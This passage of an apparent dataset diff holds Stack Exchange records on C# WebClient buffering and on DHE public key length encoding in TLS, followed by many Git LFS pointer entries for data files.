buffer = new byte[16 * 1024];\n int read;\n\n while ((read = stream.Read(buffer, 0, buffer.Length)) > 0)\n {\n fs.Write(buffer, 0, read);\n\n processed += read;\n OnDownloadItemDownloadProgressChanged(new DownloadProgressChangedEventArgs(processed, totalLength));\n }\n }\n\n File.Move(tmpPath, SavePath);\n\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(false));\n }\n catch (Exception ex)\n {\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true, ex));\n }\n }\n\n public override void StopDownload()\n {\n _webClient?.CancelAsync();\n }\n\n public override void Dispose()\n {\n _webClient?.Dispose();\n }\n\n public override int GetHashCode()\n {\n return Item.GetHashCode();\n }\n\n public override bool Equals(object obj)\n {\n var item = obj as DownloadItem;\n\n return Item.Equals(item?.Item);\n }\n}\n<\/code>\nHowever thanks for the help!\nComment: @Maddin that would be quite pointless since you then would have two buffers that need to be allocated. The returning stream already contains a buffer and a buffered stream contains one as well. Don't bother what implementation of `Stream` you are working with, it's only important that you work with streams rather than big byte arrays. And you really should use `HttpClient` instead of `WebClient`.\nComment: Could it also be a solution to use the .Net `BufferedStream` class ([MS docs](https:\/\/learn.microsoft.com\/en-us\/dotnet\/api\/system.io.bufferedstream?view=net-7.0)) for reading in chunks to bypass the LOH?\nComment: @Maddin using any Stream is fine since they have an underlying buffer that fits into the memory size constraints anyways. However, if you acquire a stream from an `HttpClient` you cannot control what `Stream` implementation you get anyways.\nComment: Thanks for clarification. Shouldn't it be possible to create a `BufferedStream` from the `Stream` return by `WebClient.OpenReadAsync`? The ctor takes a stream.\n","meta":{"source":"stackoverflow","title":"C# WebClient - Large increase of LOH after downloading files","dup_signals":{}},"subset":"stackexchange"} +{"text":"DHE key exchange with p value 257 bytes but a pubkey of 256 bytes\n\nQuestion: I came across a packet capture in Wireshark where p length = 257 bytes and pubkey length = 256 bytes. See the ServerKeyExchange snip below:\n<code>Diffie-Hellman Server Params\n p Length: 257\n p: 00a81c7b6633732007ba19bf733fc5f6cf5d0c9f8e03ec4c3caebbe392bb8830b5cb1144\u2026\n g Length: 1\n g: 05\n Pubkey Length: 256\n Pubkey: 8b55fc1f255a06c2619bc44a398df6feeefdc236ab376fbcfe3908b30c41b5d5aac4847a\u2026\n Signature Algorithm: rsa_pkcs1_sha256 (0x0401)\n Signature Length: 256\n Signature: 66b99953613dc8650a465e9b9cf8187e29df14fe5e758086772393fec9c41a4956703b4e\u2026\n<\/code>\nIn the ClientKeyExchange length of pubkey = 257 bytes as below:\n<code>Diffie-Hellman Client Params\n Pubkey Length: 257\n Pubkey: 0095bd9694bbfaf4d30520ce013cb6487a67c7e2d4735ecf58f4dab3b322893c256c539c\u2026\n\n<\/code>\nThe SSL handshake is successful. I'm curious to know how and why?\nAren't the length of pubkey in ServerKeyExchange and ClientKeyExchange supposed to be the same?\nAnswer: The length as such doesn't matter; the numeric value does. Both publickey values -- Ys and Yc -- must be numerically less than p (and greater than one), and both your examples are.\nThe numbers used in 'classic'\/modp\/Zp DHE, now retronymed finite-field DHE = FFDHE, are always positive, and are encoded in SSL\/TLS as unsigned, so leading zero bytes don't affect the value. 
The minimum size needed for either Y value is not greater than that needed for p, and most of the time it is equal, but about half a percent of the time (at random) it is actually smaller.\nHowever, the 'bignum' features or libraries used in SSL\/TLS implementations often handle signed as well, and may need a leading zero byte on numbers that would otherwise have the high bit set because that is used as the representation for a negative number, which we don't want here. It may not be worth the trouble of removing or avoiding that 'extra' byte.\nSSL\/TLS does not require minimum-length encoding of numbers so it would be legal, though silly, to add even more (redundant) leading zero bytes up to the encoding size limit of 65535 bytes. This might be a good place for more 'GREASE' if practically everybody weren't now using elliptic curves (ECDHE\/XDHE) instead of FFDHE.\nIn contrast both ASN.1 DER\/BER and SSH use signed (two's complement) minimum-length, so for them the 'extra' zero is sometimes required and sometimes prohibited, but the numeric values still follow the rule above. (PGP doesn't use FFDH, but for similar algos uses unsigned with the length implied from the exact number of significant bits, which is necessarily minimum-length.)\nComment: Neatly explained! Thanks for your answer.\n","meta":{"source":"security.stackexchange","title":"DHE key exchange with p value 257 bytes but a pubkey of 256 bytes","dup_signals":{}},"subset":"stackexchange"} diff --git a/data/stackexchange/1-1/228_2289.jsonl b/data/stackexchange/1-1/228_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..25a624b232fedd30712e0c050671ca564ac7c43e --- /dev/null +++ b/data/stackexchange/1-1/228_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9300f0f4fdc0a2d4a7baa4f3432de5f405d18fb00ff3473fcc13fe7dd6fe85a7 +size 37531964 diff --git a/data/stackexchange/1-1/229_2289.jsonl b/data/stackexchange/1-1/229_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4929e4ff300e8e588dd8a20c42f212b1c847b4db --- /dev/null +++ b/data/stackexchange/1-1/229_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b4a0af1fc8ba1701dfa9efe0470be195f082984a08a90257db1dab2f0042dcfd +size 37436856 diff --git a/data/stackexchange/1-1/22_2289.jsonl b/data/stackexchange/1-1/22_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c9eba07c81987f4ef23eae254cb529c4b493c8da --- /dev/null +++ b/data/stackexchange/1-1/22_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:521631bd8bc4e1a83085393183bf25e4cbf9fdeaed708af4a228fabc07a3ad8a +size 36309936 diff --git a/data/stackexchange/1-1/230_2289.jsonl b/data/stackexchange/1-1/230_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..73e70f1d854881fae6a712adaefdf64e118087bb --- /dev/null +++ b/data/stackexchange/1-1/230_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1384a5139a7ad81a73b0a62669d4b01aa1519335e379cd072b28b9ea51d7da91 +size 37727703 diff --git a/data/stackexchange/1-1/231_2289.jsonl b/data/stackexchange/1-1/231_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..391ac13ef761a9e9753a16f90219ab845544dee1 --- /dev/null +++ b/data/stackexchange/1-1/231_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec01f7bd1864c72c06619a638b3ec888413f8447d45106996798fe7fc3c0e3bb +size 37256718 diff --git 
a/data/stackexchange/1-1/232_2289.jsonl b/data/stackexchange/1-1/232_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4ba882bcdfa78d883515f70e86f815ce4be7b622 --- /dev/null +++ b/data/stackexchange/1-1/232_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5812d899c88067074a35d02dabc55c7e637ac392cdb78e83a084971bc17a778b +size 36857337 diff --git a/data/stackexchange/1-1/233_2289.jsonl b/data/stackexchange/1-1/233_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e9d5bb1e073692c95ebe15a1c27dcba60c615fb9 --- /dev/null +++ b/data/stackexchange/1-1/233_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5d847945a49e63ecd9a0da45e2797c5d92ca69c0396a4ffdb9d51fe81aad76d7 +size 38251495 diff --git a/data/stackexchange/1-1/234_2289.jsonl b/data/stackexchange/1-1/234_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..de827f6160e6549e2d5c1ef1957701173bacf799 --- /dev/null +++ b/data/stackexchange/1-1/234_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:55de8e0ce934d3c012c2f2566a3797042d0f1ce3a0acb8c484f319dc5b7ebfc4 +size 37790219 diff --git a/data/stackexchange/1-1/235_2289.jsonl b/data/stackexchange/1-1/235_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e4bcff8f4f422da14b6103b88d7951b9ea402f43 --- /dev/null +++ b/data/stackexchange/1-1/235_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:05145438fdf90fc259de6261fd9f8c1d1ef49f89603c20e6e5dd5ee1854dbaa0 +size 37739491 diff --git a/data/stackexchange/1-1/236_2289.jsonl b/data/stackexchange/1-1/236_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f853f47934581aaa95495c9c0c0b4ef6fb81b9eb --- /dev/null +++ b/data/stackexchange/1-1/236_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3ca9abd67d6f98f0a82504ed9173df8a2f9163b0365c5920517991226abff182 +size 37276282 diff --git a/data/stackexchange/1-1/237_2289.jsonl b/data/stackexchange/1-1/237_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..280d3690df426d82e37a9642e01f48ffa84cd6f9 --- /dev/null +++ b/data/stackexchange/1-1/237_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7a914294e85607945ca0ad36d7c10cc40e0d1ca5842aad054021e515c75a7770 +size 37910091 diff --git a/data/stackexchange/1-1/238_2289.jsonl b/data/stackexchange/1-1/238_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0c1364c5843797e61629a9b3a0c31658ef45b594 --- /dev/null +++ b/data/stackexchange/1-1/238_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f3e8148deb28f2063827d055481208eaacb2ddf804920211bda3d82401f5ffe4 +size 38455257 diff --git a/data/stackexchange/1-1/239_2289.jsonl b/data/stackexchange/1-1/239_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9f006254de4b7e92172286e1da2db95090604bb3 --- /dev/null +++ b/data/stackexchange/1-1/239_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6f8c31988d28b70102ce4e7c422d7fa88dfeab70bf4cad0364ffeeb6e40aa0b8 +size 38069260 diff --git a/data/stackexchange/1-1/23_2289.jsonl b/data/stackexchange/1-1/23_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b64862325e2714812ceefa981704dc45b6a1c3fe --- /dev/null +++ b/data/stackexchange/1-1/23_2289.jsonl @@ -0,0 +1,3 @@ 
+version https://git-lfs.github.com/spec/v1 +oid sha256:25ac860223421a2f639e504cf11a4337f462a8bc0fac137c53027c0f9a015b28 +size 35947009 diff --git a/data/stackexchange/1-1/240_2289.jsonl b/data/stackexchange/1-1/240_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ce9b81c71174a8e612f1ad3ecf41914f40abc7b4 --- /dev/null +++ b/data/stackexchange/1-1/240_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fbf51e4a2d3c76d25cbb7d517f07b5db5dca4609f1275be446d69f83cc123d5d +size 37670426 diff --git a/data/stackexchange/1-1/241_2289.jsonl b/data/stackexchange/1-1/241_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b8896be5d00d6efdeb8b888c017cd65c71947bec --- /dev/null +++ b/data/stackexchange/1-1/241_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4210f73f5d33e167d0c54be31d4520f49d07381677c52e6d4b221ecc219420b8 +size 36631384 diff --git a/data/stackexchange/1-1/242_2289.jsonl b/data/stackexchange/1-1/242_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..61c0fe62b754deb1b28b496e7187d96f4a09a31e --- /dev/null +++ b/data/stackexchange/1-1/242_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:513734499b5b1ca69a30aead6edaa9d97f2219a17f5c329da6d456e68d602b0a +size 38908292 diff --git a/data/stackexchange/1-1/243_2289.jsonl b/data/stackexchange/1-1/243_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4bf0ccf8a27496ded48be11dad4be4fed5f0b8b2 --- /dev/null +++ b/data/stackexchange/1-1/243_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f4c0ffcebd9674fdf5d75534452fb8ea937e93b91a20c57ff4a9e3ba6539a2e1 +size 37316206 diff --git a/data/stackexchange/1-1/244_2289.jsonl b/data/stackexchange/1-1/244_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..96b7b71791947676752123550599c9405432b61c --- /dev/null +++ b/data/stackexchange/1-1/244_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a74c401cb5a3bdc03ccade0fa45cd84bbbe626d94afd03b473bf7dbb7a99bd42 +size 37919096 diff --git a/data/stackexchange/1-1/245_2289.jsonl b/data/stackexchange/1-1/245_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dd808a2e703ee095b8321550e14eaa920882e7da --- /dev/null +++ b/data/stackexchange/1-1/245_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9320285d728496c6d7b644128092bcb9f94ee953e545c292d3fefaa7d4d3f7a9 +size 37745743 diff --git a/data/stackexchange/1-1/246_2289.jsonl b/data/stackexchange/1-1/246_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7a2a33a0de7080947180de5ffb9e6895fb884680 --- /dev/null +++ b/data/stackexchange/1-1/246_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8582426f4cd35af393da40108d59b7f74b4d9a82c0e2ec09ca589e28c08bebfa +size 37775474 diff --git a/data/stackexchange/1-1/247_2289.jsonl b/data/stackexchange/1-1/247_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c75018b31b840bef16e8b705b64dc79e7637506e --- /dev/null +++ b/data/stackexchange/1-1/247_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1e74e42cc1eb44b38eb6ab24163f73f8d3aad57a531cce2225d0f74b691c28b5 +size 38107747 diff --git a/data/stackexchange/1-1/248_2289.jsonl b/data/stackexchange/1-1/248_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..e9140dad2bcf5872b4f91adc4135d0073a544b12 --- /dev/null +++ b/data/stackexchange/1-1/248_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a69ea8cefe6b4c9fba28cface558b4167576f93060e665940ae34997d7387b18 +size 38706368 diff --git a/data/stackexchange/1-1/249_2289.jsonl b/data/stackexchange/1-1/249_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f00bd0919b6fa5571940f9200c12cbbce2034f4a --- /dev/null +++ b/data/stackexchange/1-1/249_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a22a5d88c55fe6eaeaa82a3e0373b88a7e7bc52bf12eb0147a110a06dde29a82 +size 38353158 diff --git a/data/stackexchange/1-1/24_2289.jsonl b/data/stackexchange/1-1/24_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..874d45624c9b8ae339399cbdb4489c554c8dad92 --- /dev/null +++ b/data/stackexchange/1-1/24_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fa5fbe70d3c38a6abe8ff5f94ed66f79636988a76a5258400364837297aac537 +size 35446976 diff --git a/data/stackexchange/1-1/250_2289.jsonl b/data/stackexchange/1-1/250_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..191c2503a035bb620c8c557b96487519286b41f5 --- /dev/null +++ b/data/stackexchange/1-1/250_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9fc6887a8d5c0f577a61ad660880e295259ccd69009278b58a8816c32d75f159 +size 35350670 diff --git a/data/stackexchange/1-1/251_2289.jsonl b/data/stackexchange/1-1/251_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6ca19da1a90dc4c435879c45df407dda50cbfe6f --- /dev/null +++ b/data/stackexchange/1-1/251_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0ffe991cada9523ae906c230fe684a5a7ff89d9f1d0d01670ed63357c7b1e318 +size 35442791 diff --git a/data/stackexchange/1-1/252_2289.jsonl b/data/stackexchange/1-1/252_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5b31f4cafd2805bbe7eec79b710465eac3d7c4ae --- /dev/null +++ b/data/stackexchange/1-1/252_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:67fa632eeebd99d1e1df57d140581f65579e2c1b445bb1761fbf19767d0ef962 +size 35013691 diff --git a/data/stackexchange/1-1/253_2289.jsonl b/data/stackexchange/1-1/253_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9adca29992a203f410495e6939509bab91e110a5 --- /dev/null +++ b/data/stackexchange/1-1/253_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:34a4afe27f79f133551d1b0d27a5396842bed32b9e69f0b2bae4085b5cc833a1 +size 34812005 diff --git a/data/stackexchange/1-1/254_2289.jsonl b/data/stackexchange/1-1/254_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b720eb155b83cb28fca9fcee9037e9c82141d350 --- /dev/null +++ b/data/stackexchange/1-1/254_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f5b9d23fb3abc823db3a5b7315e34f53274fbc47ffca4bedfe5956872944a69f +size 35262484 diff --git a/data/stackexchange/1-1/255_2289.jsonl b/data/stackexchange/1-1/255_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fb591a3a25bd6eb61f1ed1ecfe64c70aa7f92c31 --- /dev/null +++ b/data/stackexchange/1-1/255_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:f9dec9a0a982679a578f1b86f59224ba89c17702c1eb55dd8950aa9465518852 +size 35747214 diff --git a/data/stackexchange/1-1/256_2289.jsonl b/data/stackexchange/1-1/256_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a5e9fbbe41f16ea7d294eb51230bf53e8c2e8b27 --- /dev/null +++ b/data/stackexchange/1-1/256_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c8bdfd0f44156e3cba80a7b4dd2c352ecd9eb8ca64c1b4a05d375bf11cb67afa +size 35337939 diff --git a/data/stackexchange/1-1/257_2289.jsonl b/data/stackexchange/1-1/257_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a79bfce097603ae36948aae8ef3bf9b855da3ede --- /dev/null +++ b/data/stackexchange/1-1/257_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ae7000c3a6f18dc83732fd500590e01c68cad68e0c71bb4372395ed105bf0d9d +size 35156036 diff --git a/data/stackexchange/1-1/258_2289.jsonl b/data/stackexchange/1-1/258_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e2f8eb797c8603d0c728e28d58a0da2c7409ea29 --- /dev/null +++ b/data/stackexchange/1-1/258_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e17de04777c86b97377b46a80124e2689407bc9f263c53e95d9dc1b42c4d54d7 +size 35303981 diff --git a/data/stackexchange/1-1/259_2289.jsonl b/data/stackexchange/1-1/259_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4f9669992fb990134b80894f87eeb5f25e7994ab --- /dev/null +++ b/data/stackexchange/1-1/259_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b50317b0770a6dfe69e4a9ceda67ce4864d4a4968b1cdb5f1a8d2667a853992e +size 34492282 diff --git a/data/stackexchange/1-1/25_2289.jsonl b/data/stackexchange/1-1/25_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e6c7a8040ff52ad1596c2e1f1f4be36f49aa2f4c --- /dev/null +++ b/data/stackexchange/1-1/25_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1247ed377bf291a2f06c1fe4d552aeb3f328908710a7f2c482a1b91302389dcf +size 35928223 diff --git a/data/stackexchange/1-1/260_2289.jsonl b/data/stackexchange/1-1/260_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..02619e39c6b779c6408a67ac5571fcb9a3dba125 --- /dev/null +++ b/data/stackexchange/1-1/260_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d48cd05c69e9d7617e9eaa533f301df7ca04523dcd5779bceca1c4d02776beee +size 35272838 diff --git a/data/stackexchange/1-1/261_2289.jsonl b/data/stackexchange/1-1/261_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0e406dfeecc915666e919637debb88667e770b06 --- /dev/null +++ b/data/stackexchange/1-1/261_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0cdee776c116401bdf6b3a01f63a0cbcc8e693b269467930b0314419c81244b5 +size 35237996 diff --git a/data/stackexchange/1-1/262_2289.jsonl b/data/stackexchange/1-1/262_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..320c9902cf23fda735d47cf57d0752c472ff9649 --- /dev/null +++ b/data/stackexchange/1-1/262_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ffa3805511ac450e6a0d928ab7f0bb8b04ec68a437a50760398af36bb4fa8e8c +size 35024468 diff --git a/data/stackexchange/1-1/263_2289.jsonl b/data/stackexchange/1-1/263_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..28521a84c818337d89e5f3af705b01122a7533cc --- /dev/null +++ b/data/stackexchange/1-1/263_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:64f88c2d7f16801271a1fafaf7355fe1bafa6aa7456c815ce0f48ffb4dc8a02b +size 34733799 diff --git a/data/stackexchange/1-1/264_2289.jsonl b/data/stackexchange/1-1/264_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a1742cbf2770186b91b7b7e2a824ce240a3ca1c8 --- /dev/null +++ b/data/stackexchange/1-1/264_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eed6fb58ace5713dda366059020b200c3800dd0f53bd0647755f89239628d431 +size 35261980 diff --git a/data/stackexchange/1-1/265_2289.jsonl b/data/stackexchange/1-1/265_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4e5792ff6d206a1d1316a764dea0e712ae48996c --- /dev/null +++ b/data/stackexchange/1-1/265_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0ad9b14f4f3717da096e1872a4656d9aa45f2a2eb77ad3ff35fcc1c50b845a4c +size 35370619 diff --git a/data/stackexchange/1-1/266_2289.jsonl b/data/stackexchange/1-1/266_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7120dc4c5fff0fff170cf77f796402abcfd45b54 --- /dev/null +++ b/data/stackexchange/1-1/266_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c8d9ee0051d2ebf12a27a2ef879e721b7b98622593cdf9005a90de79ff05091f +size 35062276 diff --git a/data/stackexchange/1-1/267_2289.jsonl b/data/stackexchange/1-1/267_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aa71add5d6557c70a33a6dcd7e43b6dde11b6bbf --- /dev/null +++ b/data/stackexchange/1-1/267_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:405908fd5e773ca8d34e2fc08bc450dc39cda180afd7fc895ad8f28c58197844 +size 35490107 diff --git a/data/stackexchange/1-1/268_2289.jsonl b/data/stackexchange/1-1/268_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fe59e70ed6956eeb1d3994b50bd39d59a3879dcd --- /dev/null +++ b/data/stackexchange/1-1/268_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9d8d70e884fb573503c1154c56c5fb10c6164afcbe0741161de05ecc996e8a6 +size 35110071 diff --git a/data/stackexchange/1-1/269_2289.jsonl b/data/stackexchange/1-1/269_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7e5b23d9ae1c839007353fe7b4927be4eb45c528 --- /dev/null +++ b/data/stackexchange/1-1/269_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:898e6f13a36986cf488b163ac380538416f1c35d0dbc2962ac48015cd6b43997 +size 35434011 diff --git a/data/stackexchange/1-1/26_2289.jsonl b/data/stackexchange/1-1/26_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..983c6887729391dd2407916d611f9e3978917430 --- /dev/null +++ b/data/stackexchange/1-1/26_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dbc6e81214c00423e50d5bf4594479bb85efb563f316732fc4ecca3d708bc963 +size 36224413 diff --git a/data/stackexchange/1-1/270_2289.jsonl b/data/stackexchange/1-1/270_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5d6525a808bdfe3f3b341a49339cae4f384c78e0 --- /dev/null +++ b/data/stackexchange/1-1/270_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:e9ed6a4a49ad21fcfecbef0a2b512394ba8f31cecd74ab9622d4d5e86bf05ca4 +size 34640570 diff --git a/data/stackexchange/1-1/271_2289.jsonl b/data/stackexchange/1-1/271_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..43ad53485a830fe5bbac7eca8f441b47847b083b --- /dev/null +++ b/data/stackexchange/1-1/271_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0a388278fc7322718fc7292be4cc692140a36b6e9bc9ee8d723327279d3975c +size 35398158 diff --git a/data/stackexchange/1-1/272_2289.jsonl b/data/stackexchange/1-1/272_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..780b407c538c3fbf7d8efbc0d0638a4baeb12d8a --- /dev/null +++ b/data/stackexchange/1-1/272_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e22b1238686eb08c1fd4d28eee8cc590ac8b0fc993480c2a3bbfe8cbf0e8cfae +size 35254737 diff --git a/data/stackexchange/1-1/273_2289.jsonl b/data/stackexchange/1-1/273_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..60e7660a0086429749e8e23438a5c4a228c6cc2d --- /dev/null +++ b/data/stackexchange/1-1/273_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dc8daab4df271b6cd66d4a7fb7276cfafaeaab28de3d595777ef0f699a24f2ab +size 34941120 diff --git a/data/stackexchange/1-1/274_2289.jsonl b/data/stackexchange/1-1/274_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fad749c6a8c5a331f878e3f3d4a7c1c1efa8e931 --- /dev/null +++ b/data/stackexchange/1-1/274_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:30bc7f75444d055364f556572c3e08796cc4a03bf41c44b0ec7adb3ee059be85 +size 35367380 diff --git a/data/stackexchange/1-1/275_2289.jsonl b/data/stackexchange/1-1/275_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..441b14ace7babdb523ce93234dbcf310f18777ad --- /dev/null +++ b/data/stackexchange/1-1/275_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:663455fc303534eead0a42e789f8789c949217fbeb7434649a745f596a77061e +size 35400789 diff --git a/data/stackexchange/1-1/276_2289.jsonl b/data/stackexchange/1-1/276_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4039184384ff3386a3b2c7ed4841c37bc67a8f2c --- /dev/null +++ b/data/stackexchange/1-1/276_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7a3ee9c2b8d3b8edd400b644667bff89985c8920c52336d49f9283336d5042ba +size 34933981 diff --git a/data/stackexchange/1-1/277_2289.jsonl b/data/stackexchange/1-1/277_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2c3999ddc638ad41feafecb296ffe17d96bbd9a6 --- /dev/null +++ b/data/stackexchange/1-1/277_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:21c9becedb790df37b60390296a325ecc553c58de7d0f92e142283bc3200c40a +size 35685851 diff --git a/data/stackexchange/1-1/278_2289.jsonl b/data/stackexchange/1-1/278_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cb282920cb424265d378d8e8511b6a0348760000 --- /dev/null +++ b/data/stackexchange/1-1/278_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:994d62fa21e0874526ab80f4a8ef96409fe1c769abc755decb15829146d9fc66 +size 35497160 diff --git a/data/stackexchange/1-1/279_2289.jsonl b/data/stackexchange/1-1/279_2289.jsonl new file mode 100644 index 
